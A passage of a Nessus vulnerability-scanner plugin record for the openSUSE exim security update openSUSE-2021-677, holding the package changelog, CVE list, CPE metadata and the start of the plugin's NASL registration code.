major service buffer; this failed because the buffer was in use at the time. Change to a compile-time increase in the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This reduces time for some exim process initialisations. It does mean that the logging of TLS configuration problems is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes, to conform to RFC 8301. They can still be enabled, using the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It seems that the PAM library frees one of the arguments given to it, despite the documentation. Therefore a plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp context. Previously on-stack buffers were used, resulting in a taint trap when DSN information copied from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error messages from DMARC verify, when it hit the nonexistent file indicated by the default. Distros wanting DMARC enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities. The introduction of taint tracking also did many adjustments to string handling. Since then, eximon frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT commands sent and check for 452 responses. This slightly helps the inefficieny of doing a large alias-expansion into a recipient-limited target. The max_rcpt transport option still applies (and at the current default, will override the new feature). The check is done for either cause of synch, and forces a fast-retry of all 452'd recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being used, so the results became garbage. Make copies while it is still usable.\n\n - Logging: when the deliver_time selector ise set, include the DT= field on delivery deferred (==) and failed (**) lines (if a delivery was attemtped). Previously it was only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN variables in time for the expansion of the server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from untrusted sources.\n\n - Use longer file names for temporary spool files (this avoids name conflicts with spool on a shared file system).\n\n - Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow in string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion which could allow remote attackers to execute other programs with root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n\n - add workaround patch for compile time error on missing printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the 'queue=' ACL modifier. This matches the restriction on the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a single column. Previously only the last row was returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept result of MIME ACL.\n\n - The 'support for' informational output now, which built with Content Scanning support, has a line for the malware scanner interfaces compiled in. Interface can be individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now additionally output by 'exim -d -bV'. Previously only the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also erroneously seen as a timeout on read on a GnuTLS initiating connection, resulting in the initiating connection being dropped.\n\n - Relax results from ACL control request to enable cutthrough, in unsupported situations, from error to silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast malware scanner.\n\n - Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read, by skipping non- macro text after a replacement (previously it was only once per line) and by skipping builtin macros when searching for an uppercase lead character.\n\n - DANE support moved from Experimental to mainline. The Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden by ACL, DMARC reported the original. Fix to report (as far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n\n - Fix utf8_downconvert propagation through a redirect router.\n\n - Bug 2253: For logging delivery lines under PRDR, append the overall DATA response info to the (existing) per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message acceptance are marked dead before release of memory in the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such as a multi-recipient message from a mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being replaced by the $(authresults ) expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as PID 1. This allows proper process termination in container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP transport. Previously the 'final dot' had a newline after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome values 'err_temp' and 'err_perm', deprecated since 4.83 when the RFC-defined words ' temperror' and 'permerror' were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and nonunderstood responses) in defer=pass mode supply a 450 to the initiator. Previously the message would be spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline protocol.\n\n - Fix reinitialisation of DKIM logging variable between messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form, since the IETF WG has not yet settled on that versus the original 'bare' representation.\n\n - Fix syslog logging for syslog_timestamp=no and log_selector +millisec. Previously the millisecond value corrupted the output. Fix also for syslog_pid=no and log_selector +pid, for which the pid corrupted the output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly during configuration. Wildcards are allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing adjacent sets of identical IP addresses on different listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce load on peers. Disable the session-cache too, which might reduce our load. Since we currrectly use a new context for every connection, both as server and client, there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at <https://reproducible-builds.org/specs/source-date-epoch />.\n\n - Fix smtp transport use of limited max_rcpt under mua_wrapper. Previously the check for any unsuccessful recipients did not notice the limit, and erroneously found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels that support MSG_MORE. Only in-clear (not on TLS connections).\n\n - Avoid using a temporary file during transport using dkim. Unless a transport-filter is involved we can buffer the headers in memory for creating the signature, and read the spool data file once for the signature and again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It was disabled in 4.77 as the kernel support then wasn't solid, having issues in 64bit mode. Now, it's been long enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface, accept an empty cmdline element to get the documented default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an identity given in dkim_verify_signers, run the dkim acl once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded before use\n\n - Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-677.NASL", "href": "https://www.tenable.com/plugins/nessus/149614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-677.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149614);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2017-1000369\",\n \"CVE-2017-16943\",\n \"CVE-2017-16944\",\n \"CVE-2018-6789\",\n \"CVE-2019-10149\",\n \"CVE-2019-13917\",\n \"CVE-2019-15846\",\n \"CVE-2019-16928\",\n \"CVE-2020-12783\",\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2021-677) (Stack Clash)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool\n directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in\n parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in\n parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header\n file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for\n privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in\n receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header\n file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in\n extract_option()\n\n - CVE-2020-28026: Line truncation and injection in\n spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after\n BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in\n pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we\n reset known-good where we know we need to not be reading\n BDAT data, as a general case fix, and move the places\n where we switch to BDAT mode until after various\n protocol state checks. Fixes CVE-2020-BDATA reported by\n Qualys.\n\n - Fix security issue in SMTP verb option parsing\n (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message\n (to remove a known security problem if someone does set\n recipients_max to unlimited, or if local additions add\n to the recipient list). Fixes CVE-2020-RCPTL reported by\n Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against\n cmdline invoker providing a particularly obnoxious\n sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard\n against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes\n boo#1173693)\n\n - bring in changes from current +fixes (lots of taint\n check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to\n match other mail- related applications. Previously an\n 'H' was used where available info says that 'M' should\n be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values\n are commonly used as arguments, so an implementation\n trying to copy these into a local buffer was taking a\n taint-enforcement trap. Fix by using dynamically created\n buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using\n tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a\n local. Do similar fixes for ACL actions 'dcc',\n 'log_reject_target', 'malware' and 'spam'; the arguments\n are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code\n rearrangement had broken the (no-op) support for this\n sendmail command. Restore it to doing nothing, silently,\n and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in\n constructing their delivery location this WILL BREAK\n configurations which are not updated accordingly. In\n particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the\n Router to make it safe, should be updated to replace\n $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header\n name that ends with an asterisk (which is a\n standards-legal name) will now result in all headers\n named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee\n 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module\n (lookups) open failure, only retrieve the errormessage\n once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a major service\n buffer; this failed because the buffer was in use at the\n time. Change to a compile-time increase in the buffer\n size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n\n - Avoid costly startup code when not strictly needed. This\n reduces time for some exim process initialisations. It\n does mean that the logging of TLS configuration problems\n is only done for the daemon startup.\n\n - Early-pipelining support code is now included unless\n disabled in Makefile.\n\n - DKIM verification defaults no long accept sha1 hashes,\n to conform to RFC 8301. They can still be enabled, using\n the dkim_verify_hashes main option.\n\n - Support CHUNKING from an smtp transport using a\n transport_filter, when DKIM signing is being done.\n Previously a transport_filter would always disable\n CHUNKING, falling back to traditional DATA.\n\n - Regard command-line receipients as tainted.\n\n - Bug 340: Remove the daemon pid file on exit, whe due to\n SIGTERM.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition. It\n seems that the PAM library frees one of the arguments\n given to it, despite the documentation. Therefore a\n plain malloc must be used.\n\n - Bug 2491: Use tainted buffers for the transport smtp\n context. Previously on-stack buffers were used,\n resulting in a taint trap when DSN information copied\n from a received message was written into the buffer.\n\n - Bug 2493: Harden ARC verify against Outlook, whick has\n been seen to mix the ordering of its ARC headers. This\n caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when\n needed. Previously when a new record was being\n constructed with information from the peer, a trap was\n taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n Previously a naiive installation would get error\n messages from DMARC verify, when it hit the nonexistent\n file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option.\n Also enforce no DMARC verification for command-line\n sourced messages.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform,\n hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before\n handling another message on a connection. Previously if\n one message had ARC headers and the following one did\n not, a crash could result when adding an\n Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string\n handling between the Exim main code and Exim-related\n utities. The introduction of taint tracking also did\n many adjustments to string handling. Since then, eximon\n frequently terminated with an assert failure.\n\n - When PIPELINING, synch after every hundred or so RCPT\n commands sent and check for 452 responses. This slightly\n helps the inefficieny of doing a large alias-expansion\n into a recipient-limited target. The max_rcpt transport\n option still applies (and at the current default, will\n override the new feature). The check is done for either\n cause of synch, and forces a fast-retry of all 452'd\n recipients using a new MAIL FROM on the same connection.\n The new facility is not tunable at this time.\n\n - Fix the variables set by the gsasl authenticator.\n Previously a pointer to library live data was being\n used, so the results became garbage. Make copies while\n it is still usable.\n\n - Logging: when the deliver_time selector ise set, include\n the DT= field on delivery deferred (==) and failed (**)\n lines (if a delivery was attemtped). Previously it was\n only on completion (=>) lines.\n\n - Authentication: the gsasl driver not provides the $authN\n variables in time for the expansion of the\n server_scram_iter and server_scram_salt options.\n\nspec file cleanup to make update work\n\n - add docdir to spec\n\n - update to exim 4.93\n\n - SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n\n - DISABLE_TLS replaces SUPPORT_TLS\n\n - Bump the version for the local_scan API.\n\n - smtp transport option hosts_try_fastopen defaults to\n '*'.\n\n - DNSSec is requested (not required) for all queries.\n (This seemes to ask for trouble if your resolver is a\n systemd-resolved.)\n\n - Generic router option retry_use_local_part defaults to\n 'true' under specific pre-conditions.\n\n - Introduce a tainting mechanism for values read from\n untrusted sources.\n\n - Use longer file names for temporary spool files (this\n avoids name conflicts with spool on a shared file\n system).\n\n - Use dsn_from main config option (was ignored\n previously).\n\n - update to exim 4.92.3\n\n - CVE-2019-16928: fix against Heap-based buffer overflow\n in string_vformat, remote code execution seems to be\n possible\n\n - update to exim 4.92.2\n\n - CVE-2019-15846: fix against remote attackers executing\n arbitrary code as root via a trailing backslash\n\n - update to exim 4.92.1\n\n - CVE-2019-13917: Fixed an issue with $(sort) expansion\n which could allow remote attackers to execute other\n programs with root privileges (boo#1142207)\n\n - spec file cleanup\n\n - fix DANE inclusion guard condition\n\n - re-enable i18n and remove misleading comment\n\n - EXPERIMENTAL_SPF is now SUPPORT_SPF\n\n - DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n\n - $(l_header:<name>) expansion\n\n - $(readsocket) now supports TLS\n\n - 'utf8_downconvert' option (if built with SUPPORT_I18N)\n\n - 'pipelining' log_selector\n\n - JSON variants for $(extract ) expansion\n\n - 'noutf8' debug option\n\n - TCP Fast Open support on MacOS\n\n - CVE-2019-10149: Fixed a Remote Command Execution\n (boo#1136587)\n\n - add workaround patch for compile time error on missing\n printf format annotation (gnu_printf.patch)\n\n - update to 4.91\n\n - DEFER rather than ERROR on redis cluster MOVED response.\n\n - Catch and remove uninitialized value warning in exiqsumm\n\n - Disallow '/' characters in queue names specified for the\n 'queue=' ACL modifier. This matches the restriction on\n the commandline.\n\n - Fix pgsql lookup for multiple result-tuples with a\n single column. Previously only the last row was\n returned.\n\n - Bug 2217: Tighten up the parsing of DKIM signature\n headers.\n\n - Bug 2215: Fix crash associated with dnsdb lookup done\n from DKIM ACL.\n\n - Fix issue with continued-connections when the DNS shifts\n unreliably.\n\n - Bug 2214: Fix SMTP responses resulting from non-accept\n result of MIME ACL.\n\n - The 'support for' informational output now, which built\n with Content Scanning support, has a line for the\n malware scanner interfaces compiled in. Interface can be\n individually included or not at build time.\n\n - The 'aveserver', 'kavdaemon' and 'mksd' interfaces are\n now not included by the template makefile 'src/EDITME'.\n The 'STREAM' support for an older ClamAV interface\n method is removed.\n\n - Bug 2223: Fix mysql lookup returns for the no-data case\n (when the number of rows affected is given instead).\n\n - The runtime Berkeley DB library version is now\n additionally output by 'exim -d -bV'. Previously only\n the compile-time version was shown.\n\n - Bug 2230: Fix cutthrough routing for nonfirst messages\n in an initiating SMTP connection.\n\n - Bug 2229: Fix cutthrough routing for nonstandard port\n numbers defined by routers.\n\n - Bug 2174: A timeout on connect for a callout was also\n erroneously seen as a timeout on read on a GnuTLS\n initiating connection, resulting in the initiating\n connection being dropped.\n\n - Relax results from ACL control request to enable\n cutthrough, in unsupported situations, from error to\n silently (except under debug) ignoring.\n\n - Fix Buffer overflow in base64d() (CVE-2018-6789)\n\n - Fix bug in DKIM verify: a buffer overflow could corrupt\n the malloc metadata, resulting in a crash in free().\n\n - Fix broken Heimdal GSSAPI authenticator integration.\n\n - Bug 2113: Fix conversation closedown with the Avast\n malware scanner.\n\n - Bug 2239: Enforce non-usability of\n control=utf8_downconvert in the mail ACL.\n\n - Speed up macro lookups during configuration file read,\n by skipping non- macro text after a replacement\n (previously it was only once per line) and by skipping\n builtin macros when searching for an uppercase lead\n character.\n\n - DANE support moved from Experimental to mainline. The\n Makefile control for the build is renamed.\n\n - Fix memory leak during multi-message connections using\n STARTTLS.\n\n - Bug 2236: When a DKIM verification result is overridden\n by ACL, DMARC reported the original. Fix to report (as\n far as possible) the ACL result replacing the original.\n\n - Fix memory leak during multi-message connections using\n STARTTLS under OpenSSL\n\n - Bug 2242: Fix exim_dbmbuild to permit directoryless\n filenames.\n\n - Fix utf8_downconvert propagation through a redirect\n router.\n\n - Bug 2253: For logging delivery lines under PRDR, append\n the overall DATA response info to the (existing)\n per-recipient response info for the 'C=' log element.\n\n - Bug 2251: Fix ldap lookups that return a single\n attribute having zero- length value.\n\n - Support Avast multiline protocol, this allows passing\n flags to newer versions of the scanner.\n\n - Ensure that variables possibly set during message\n acceptance are marked dead before release of memory in\n the daemon loop.\n\n - Bug 2250: Fix a longstanding bug in heavily-pipelined\n SMTP input (such as a multi-recipient message from a\n mailinglist manager).\n\n - The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is\n withdrawn, being replaced by the $(authresults )\n expansion.\n\n - Bug 2257: Fix pipe transport to not use a socket-only\n syscall.\n\n - Set a handler for SIGTERM and call exit(3) if running as\n PID 1. This allows proper process termination in\n container environments.\n\n - Bug 2258: Fix spool_wireformat in combination with LMTP\n transport. Previously the 'final dot' had a newline\n after it; ensure it is CR,LF.\n\n - SPF: remove support for the 'spf' ACL condition outcome\n values 'err_temp' and 'err_perm', deprecated since 4.83\n when the RFC-defined words ' temperror' and 'permerror'\n were introduced.\n\n - Re-introduce enforcement of no cutthrough delivery on\n transports having transport-filters or DKIM-signing.\n\n - Cutthrough: for a final-dot response timeout (and\n nonunderstood responses) in defer=pass mode supply a 450\n to the initiator. Previously the message would be\n spooled.\n\n - DANE: add dane_require_tls_ciphers SMTP Transport\n option; if unset, tls_require_ciphers is used as before.\n\n - Malware Avast: Better match the Avast multiline\n protocol.\n\n - Fix reinitialisation of DKIM logging variable between\n messages.\n\n - Bug 2255: Revert the disable of the OpenSSL session\n caching.\n\n - Add util/renew-opendmarc-tlds.sh script for safe renewal\n of public suffix list.\n\n - DKIM: accept Ed25519 pubkeys in\n SubjectPublicKeyInfo-wrapped form, since the IETF WG has\n not yet settled on that versus the original 'bare'\n representation.\n\n - Fix syslog logging for syslog_timestamp=no and\n log_selector +millisec. Previously the millisecond value\n corrupted the output. Fix also for syslog_pid=no and\n log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig()\n buildrequires. \n\n - update to 4.90.1\n\n - Allow PKG_CONFIG_PATH to be set in Local/Makefile and\n use it correctly during configuration. Wildcards are\n allowed and expanded.\n\n - Shorten the log line for daemon startup by collapsing\n adjacent sets of identical IP addresses on different\n listening ports. Will also affect 'exiwhat' output.\n\n - Tighten up the checking in isip4 (et al): dotted-quad\n components larger than 255 are no longer allowed.\n\n - Default openssl_options to include +no_ticket, to reduce\n load on peers. Disable the session-cache too, which\n might reduce our load. Since we currrectly use a new\n context for every connection, both as server and client,\n there is no benefit for these.\n\n - Add $SOURCE_DATE_EPOCH support for reproducible builds,\n per spec at\n <https://reproducible-builds.org/specs/source-date-epoch\n />.\n\n - Fix smtp transport use of limited max_rcpt under\n mua_wrapper. Previously the check for any unsuccessful\n recipients did not notice the limit, and erroneously\n found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels\n that support MSG_MORE. Only in-clear (not on TLS\n connections).\n\n - Avoid using a temporary file during transport using\n dkim. Unless a transport-filter is involved we can\n buffer the headers in memory for creating the signature,\n and read the spool data file once for the signature and\n again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It\n was disabled in 4.77 as the kernel support then wasn't\n solid, having issues in 64bit mode. Now, it's been long\n enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface,\n accept an empty cmdline element to get the documented\n default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes\n optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an\n identity given in dkim_verify_signers, run the dkim acl\n once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded\n before use\n\n - Have the EHLO response advertise VRFY, if there is a\n vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832\n CVE-2018-6789)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079832\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171490\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173693\");\n script_set_attribute(attribute:\"see_also\", 